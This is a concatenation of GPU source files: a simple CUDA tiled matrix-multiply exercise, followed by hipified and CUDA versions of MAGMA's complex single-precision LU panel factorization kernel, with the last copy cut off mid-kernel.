#include <stdio.h> #include <cstdlib> #include <iostream> #include <vector> #define BS 32 #define NUM_BLOCKS 1500 #define NUM_THREADS_PER_BLOCK 1500 #define SIZE NUM_BLOCKS*NUM_THREADS_PER_BLOCK using namespace std; cudaEvent_t start, stop; // These are specific to measure the execution of only the kernel execution - might be useful void startKernelTime (void) { cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start); } void stopKernelTime (void) { cudaEventRecord(stop); cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); cout << milliseconds << " ms have elapsed for the CUDA execution" << endl; } void checkCUDAError (const char *msg) { cudaError_t err = cudaGetLastError(); if( cudaSuccess != err) { cerr << "Cuda error: " << msg << ", " << cudaGetErrorString( err) << endl; exit(-1); } } // Fill the input parameters and kernel qualifier __global__ void dotKernel (float *dev_m1, float *dev_m2, float *dev_output) { __shared__ float shareA[BS][BS]; __shared__ float shareB[BS][BS]; int bx = blockIdx.x; int by = blockIdx.y; int tx = threadIdx.x; int ty = threadIdx.y; int row = by * BS + ty; int col = bx * BS + tx; float tmp_sum = 0.0f; for(int i = 0; i < NUM_BLOCKS/BS; ++i){ shareA[ty][tx] = dev_m1[row* NUM_BLOCKS + (i * BS + tx)]; shareB[ty][tx] = dev_m2[(i * BS + ty) * NUM_BLOCKS + col]; __syncthreads(); for(int k = 0; k < BS; ++k){ tmp_sum += shareA[ty][k] * shareB[k][tx]; __syncthreads(); } dev_output[row * NUM_BLOCKS + col] = tmp_sum; } } // Fill with the code required for the GPU dot (mem allocation, transfers, kernel launch of dotKernel) float* dotGPU (float *m1, float *m2) { float *dev_m1, *dev_m2, *dev_output; float *array_output = new float [SIZE]; // allocate the memory on the device cudaMalloc((void**) &dev_m1, sizeof(float) * SIZE); cudaMalloc((void**) &dev_m2, sizeof(float) * SIZE); cudaMalloc((void**) &dev_output, sizeof(float) * SIZE); startKernelTime(); // copy inputs to the device cudaMemcpy(dev_m1, m1, sizeof(float) * SIZE, cudaMemcpyHostToDevice); cudaMemcpy(dev_m2, m2, sizeof(float) * SIZE, cudaMemcpyHostToDevice); cudaMemcpy(dev_output, array_output, sizeof(float) * SIZE, cudaMemcpyHostToDevice); dim3 blocksPerGrid(BS, BS, 1); dim3 threadsPerBlock(NUM_THREADS_PER_BLOCK/BS, NUM_THREADS_PER_BLOCK/BS, 1); // launch the kernel dotKernel <<< blocksPerGrid, threadsPerBlock >>> (dev_m1, dev_m2, dev_output); // copy the output to the host cudaMemcpy(array_output, dev_output, sizeof(float) * SIZE, cudaMemcpyDeviceToHost); stopKernelTime(); for(size_t i = 0; i < 512; i++) { cout << array_output[i] << '\n'; } // free the device memory cudaFree(dev_m1); cudaFree(dev_m2); cudaFree(dev_output); return array_output; } int main (int argc, char** argv) { float array1 [SIZE]; float array2 [SIZE]; // initialize array with random values for (unsigned i = 0; i < SIZE; i++) { array1[i] = ((float) rand()) / ((float) RAND_MAX) * 10; array2[i] = 1; } for(size_t i = 0; i < 4; i++) { cout << array1[i * NUM_BLOCKS] << '\n'; } dotGPU(array1, array2); return 0; }
c6d2fbd237466acc4c713616d2e9d72a79bac49e.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* -- MAGMA (version 2.5.0) -- Univ. of Tennessee, Knoxville Univ. of California, Berkeley Univ. of Colorado, Denver @date January 2019 @author Azzam Haidar @author Ahmad Abdelfattah @generated from magmablas/zgetf2_native_kernel.cu, normal z -> c, Wed Jan 2 14:18:51 2019 */ #include "magma_internal.h" #include "magma_templates.h" #include "shuffle.cuh" #include "sync.cuh" #include "atomics.cuh" #include "batched_kernel_param.h" #define PRECISION_c /** Purpose ------- LU factorization of m-by-n matrix ( m >= n ). Each thread block caches an entire column in register. Thread blocks communicate and synchronize through global memory. Assumptions: 1. dA is of size MxN such that N <= M. 2. Thread block must be 1D, with TX multiple of 32 (warp size) 3. TX must be >= n 4. n must be less than the number of SMs on the GPU **/ // ============================================================================= // init kernel __global__ void cgetf2_native_init_kernel( int n, int npages, magma_int_t *ipiv, int* update_flags) { const int tx = threadIdx.x; if( tx < n){ ipiv[ tx ] = 0; } if( tx < max(n,npages) ){ update_flags[ tx ] = 0; } } // ============================================================================= // the main kernel template<int TX, int NPAGES> __global__ void cgetf2_native_kernel( int m, int n, magmaFloatComplex_ptr dA, int ldda, volatile magma_int_t *ipiv, int gbstep, volatile int* update_flag, volatile magma_int_t *info) { const int tx = threadIdx.x; const int bx = blockIdx.x; magmaFloatComplex rA[NPAGES] = {MAGMA_C_ZERO}; magmaFloatComplex rx, rx_max; magmaFloatComplex_ptr da = dA; int rx_id, max_id, flag = 0; float rx_abs = 0.0, rx_abs_max = 0.0; const int m_ = m-(NPAGES-1)*TX; if( bx >= n ) return; __shared__ magmaFloatComplex sx[ TX ]; __shared__ float sabs[ TX ]; __shared__ int smax_id[ TX ]; __shared__ magmaFloatComplex sreg; // read dA += bx * ldda + tx; #pragma unroll for(int i = 0; i < NPAGES-1; i++){ rA[i] = dA[ i * TX ]; } if( tx < m_){ rA[NPAGES-1] = dA[ (NPAGES-1) * TX ]; } // main loop #pragma unroll for(int i = 0; i < n; i++){ // icamax and write pivot for the ith thread block if(bx == i){ rx_max = rx = (tx < i) ? MAGMA_C_ZERO : rA[0]; rx_abs_max = rx_abs = fabs(MAGMA_C_REAL(rx)) + fabs(MAGMA_C_IMAG(rx)); max_id = rx_id = tx; #pragma unroll for(int j = 1; j < NPAGES; j++){ rx = rA[j]; rx_abs = fabs(MAGMA_C_REAL(rx)) + fabs(MAGMA_C_IMAG(rx)); if ( rx_abs > rx_abs_max ){ rx_max = rx; rx_abs_max = rx_abs; max_id = j * TX + tx; } } sx[ tx ] = rx_max; sabs[ tx ] = rx_abs_max; smax_id[ tx ] = max_id; __syncthreads(); // let the first warp do the final reduction step if(tx < 32){ #pragma unroll for(int j = 0; j < TX; j+= 32){ rx = sx[ j + tx ]; rx_abs = sabs[ j + tx ]; rx_id = smax_id[ j + tx ]; if ( rx_abs > rx_abs_max ){ rx_max = rx; rx_abs_max = rx_abs; max_id = rx_id; } } magmablas_syncwarp(); sx[ tx ] = rx_max; sabs[ tx ] = rx_abs_max; smax_id[ tx ] = max_id; magmablas_syncwarp(); #pragma unroll for(int j = 0; j < 32; j++){ rx = sx[j]; rx_abs = sabs[j]; rx_id = smax_id[j]; if ( rx_abs > rx_abs_max ){ rx_abs_max = rx_abs; rx_max = rx; max_id = rx_id; } } } if(tx == 0){ sx[ 0 ] = rx_max; sabs[ 0 ] = rx_abs_max; smax_id[ 0 ] = max_id; } __syncthreads(); rx_max = sx[ 0 ]; rx_abs_max = sabs[ 0 ]; max_id = smax_id[ 0 ]; __syncthreads(); // now every thread in the i^th block has the maximum if( tx == 0){ if( rx_abs_max == MAGMA_D_ZERO){ magmablas_iatomic_exchange( (magma_int_t*)info, (magma_int_t)(max_id + gbstep + 1) ); } magmablas_iatomic_exchange((magma_int_t*)&ipiv[i], (magma_int_t)(max_id+1) ); // fortran indexing } __syncthreads(); if( rx_abs_max == MAGMA_D_ZERO )return; } else{ // other thread blocks are waiting if(tx == 0){ max_id = 0; while( max_id == 0 ){ max_id = ipiv[i]; }; smax_id[ 0 ] = max_id; } __syncthreads(); max_id = smax_id[ 0 ]; max_id -= 1; // revert fortran indexing __syncthreads(); if( (*info) != 0 ) return; } // swap // swap always happens between page 0 and page x // to avoid spilling rA to local memory, we use shared memory if( max_id != i){ // all blocks swap in registers // for bx < i, the column is already written in memory, // but we have a copy in reg., so continue to swap in reg., // and do one final write to memory #pragma unroll for(int j = 0; j < NPAGES; j++){ if( j == (max_id/TX) ){ sx[ tx ] = rA[j]; __syncthreads(); if( tx == i ){ magmaFloatComplex tmp = sx[ max_id%TX ]; sx[ max_id%TX ] = rA[0]; rA[0] = tmp; } __syncthreads(); if( tx == max_id%TX ){ rA[j] = sx[ tx ]; } __syncthreads(); } } //__syncthreads(); } // the ith block does scal if(bx == i){ magmaFloatComplex reg = MAGMA_C_DIV(MAGMA_C_ONE, rx_max ); // scal if( tx > i ){ rA[0] *= reg; } #pragma unroll for(int j = 1; j < NPAGES; j++){ rA[j] *= reg; } // write column i to global memory #pragma unroll for(int j = 0; j < NPAGES-1; j++){ dA[ j * TX ] = rA[j]; } if( tx < m_){ dA[ (NPAGES-1) * TX ] = rA[NPAGES-1]; } __threadfence(); __syncthreads(); // after cuda 9.0, both are needed, not sure why if(tx == 0) magmablas_iatomic_exchange( (int *)&update_flag[ i ], 1); } // thread blocks with ID larger than i perform ger if(bx > i){ if( tx == i ){ sreg = rA[0]; } // wait for scal if( tx == 0){ flag = 0; while( flag == 0 ){ flag = update_flag[ i ]; }; } __syncthreads(); magmaFloatComplex reg = sreg; if( NPAGES == 1){ if(tx > i && tx < m_){ rA[0] -= da[ i * ldda + tx ] * reg; } }else{ if(tx > i){ rA[0] -= da[ i * ldda + tx ] * reg; } } #pragma unroll for(int j = 1; j < NPAGES-1; j++){ rA[j] -= da[ i * ldda + j * TX + tx ] * reg; } if( NPAGES > 1){ if( tx < m_ ){ rA[ NPAGES-1 ] -= da[ i * ldda + (NPAGES-1)*TX + tx ] * reg; } } } } // all blocks write their columns again except the last one if( bx < n-1 ){ #pragma unroll for(int i = 0; i < NPAGES-1; i++){ dA[ i * TX ] = rA[i]; } if( tx < m_){ dA[ (NPAGES-1) * TX ] = rA[NPAGES-1]; } } } // ============================================================================= extern "C" magma_int_t magma_cgetf2_native_fused( magma_int_t m, magma_int_t n, magmaFloatComplex_ptr dA, magma_int_t ldda, magma_int_t *ipiv, magma_int_t gbstep, magma_int_t *flags, magma_int_t *info, magma_queue_t queue ) { magma_int_t arginfo = 0; const magma_int_t ntx = CGETF2_FUSED_NTH; if( m < n || m > CGETF2_FUSED_MAX_M ){ arginfo = -1; } else if( n > magma_getdevice_multiprocessor_count() ){ arginfo = -2; } else if( ldda < max(1, m) ){ arginfo = -4; } if (arginfo != 0) { magma_xerbla( __func__, -(arginfo) ); return arginfo; } magma_int_t arch = magma_getdevice_arch(); dim3 grid(n, 1, 1); dim3 threads(ntx, 1, 1); const magma_int_t npages = magma_ceildiv(m, ntx); // the kernel uses communication among thread blocks // as a safeguard, force one thread block per multiprocessor // by allocating more than half the shared memory magma_int_t shmem = magma_getdevice_shmem_block(); shmem = (shmem / 2); int *update_flag = (int*) flags; // update_flag is an int, not magma_int_t hipLaunchKernelGGL(( cgetf2_native_init_kernel), dim3(1), dim3(max(n,npages)), 0, queue->cuda_stream() , n, npages, ipiv, update_flag); // The case statement should cover up to ( xGETF2_CHAIN_MAX_M / ntx ) switch(npages){ case 1:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 1>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 2:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 2>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 3:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 3>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 4:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 4>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 5:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 5>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 6:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 6>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 7:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 7>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 8:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 8>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 9:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 9>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 10:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 10>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 11:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 11>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 12:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 12>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 13:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 13>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 14:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 14>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 15:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 15>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 16:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 16>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 17:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 17>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 18:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 18>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 19:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 19>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 20:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 20>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #if defined(PRECISION_s) || defined(PRECISION_d) case 21:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 21>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 22:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 22>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 23:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 23>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 24:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 24>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 25:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 25>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 26:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 26>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 27:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 27>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 28:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 28>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 29:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 29>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 30:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 30>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 31:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 31>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 32:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 32>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 33:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 33>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 34:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 34>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 35:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 35>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 36:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 36>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 37:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 37>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 38:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 38>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 39:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 39>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 40:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 40>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 41:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 41>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 42:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 42>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 43:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 43>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 44:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 44>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 45:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 45>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 46:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 46>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 47:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 47>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 48:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 48>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 49:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 49>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 50:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 50>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #endif // defined(PRECISION_s) || defined(PRECISION_d) #if defined(PRECISION_s) case 51:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 51>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 52:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 52>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 53:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 53>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 54:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 54>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 55:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 55>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 56:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 56>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 57:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 57>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 58:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 58>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 59:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 59>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 60:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 60>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 61:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 61>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 62:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 62>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 63:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 63>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 64:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 64>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 65:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 65>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 66:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 66>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 67:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 67>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 68:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 68>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 69:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 69>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 70:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 70>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 71:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 71>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 72:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 72>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 73:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 73>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 74:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 74>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 75:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 75>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 76:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 76>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 77:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 77>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 78:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 78>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 79:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 79>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 80:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 80>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #endif // defined(PRECISION_s) default: printf("size not supported \n"); } return 0; }
c6d2fbd237466acc4c713616d2e9d72a79bac49e.cu
/* -- MAGMA (version 2.5.0) -- Univ. of Tennessee, Knoxville Univ. of California, Berkeley Univ. of Colorado, Denver @date January 2019 @author Azzam Haidar @author Ahmad Abdelfattah @generated from magmablas/zgetf2_native_kernel.cu, normal z -> c, Wed Jan 2 14:18:51 2019 */ #include "magma_internal.h" #include "magma_templates.h" #include "shuffle.cuh" #include "sync.cuh" #include "atomics.cuh" #include "batched_kernel_param.h" #define PRECISION_c /** Purpose ------- LU factorization of m-by-n matrix ( m >= n ). Each thread block caches an entire column in register. Thread blocks communicate and synchronize through global memory. Assumptions: 1. dA is of size MxN such that N <= M. 2. Thread block must be 1D, with TX multiple of 32 (warp size) 3. TX must be >= n 4. n must be less than the number of SMs on the GPU **/ // ============================================================================= // init kernel __global__ void cgetf2_native_init_kernel( int n, int npages, magma_int_t *ipiv, int* update_flags) { const int tx = threadIdx.x; if( tx < n){ ipiv[ tx ] = 0; } if( tx < max(n,npages) ){ update_flags[ tx ] = 0; } } // ============================================================================= // the main kernel template<int TX, int NPAGES> __global__ void cgetf2_native_kernel( int m, int n, magmaFloatComplex_ptr dA, int ldda, volatile magma_int_t *ipiv, int gbstep, volatile int* update_flag, volatile magma_int_t *info) { const int tx = threadIdx.x; const int bx = blockIdx.x; magmaFloatComplex rA[NPAGES] = {MAGMA_C_ZERO}; magmaFloatComplex rx, rx_max; magmaFloatComplex_ptr da = dA; int rx_id, max_id, flag = 0; float rx_abs = 0.0, rx_abs_max = 0.0; const int m_ = m-(NPAGES-1)*TX; if( bx >= n ) return; __shared__ magmaFloatComplex sx[ TX ]; __shared__ float sabs[ TX ]; __shared__ int smax_id[ TX ]; __shared__ magmaFloatComplex sreg; // read dA += bx * ldda + tx; #pragma unroll for(int i = 0; i < NPAGES-1; i++){ rA[i] = dA[ i * TX ]; } if( tx < m_){ rA[NPAGES-1] = dA[ (NPAGES-1) * TX ]; } // main loop #pragma unroll for(int i = 0; i < n; i++){ // icamax and write pivot for the ith thread block if(bx == i){ rx_max = rx = (tx < i) ? MAGMA_C_ZERO : rA[0]; rx_abs_max = rx_abs = fabs(MAGMA_C_REAL(rx)) + fabs(MAGMA_C_IMAG(rx)); max_id = rx_id = tx; #pragma unroll for(int j = 1; j < NPAGES; j++){ rx = rA[j]; rx_abs = fabs(MAGMA_C_REAL(rx)) + fabs(MAGMA_C_IMAG(rx)); if ( rx_abs > rx_abs_max ){ rx_max = rx; rx_abs_max = rx_abs; max_id = j * TX + tx; } } sx[ tx ] = rx_max; sabs[ tx ] = rx_abs_max; smax_id[ tx ] = max_id; __syncthreads(); // let the first warp do the final reduction step if(tx < 32){ #pragma unroll for(int j = 0; j < TX; j+= 32){ rx = sx[ j + tx ]; rx_abs = sabs[ j + tx ]; rx_id = smax_id[ j + tx ]; if ( rx_abs > rx_abs_max ){ rx_max = rx; rx_abs_max = rx_abs; max_id = rx_id; } } magmablas_syncwarp(); sx[ tx ] = rx_max; sabs[ tx ] = rx_abs_max; smax_id[ tx ] = max_id; magmablas_syncwarp(); #pragma unroll for(int j = 0; j < 32; j++){ rx = sx[j]; rx_abs = sabs[j]; rx_id = smax_id[j]; if ( rx_abs > rx_abs_max ){ rx_abs_max = rx_abs; rx_max = rx; max_id = rx_id; } } } if(tx == 0){ sx[ 0 ] = rx_max; sabs[ 0 ] = rx_abs_max; smax_id[ 0 ] = max_id; } __syncthreads(); rx_max = sx[ 0 ]; rx_abs_max = sabs[ 0 ]; 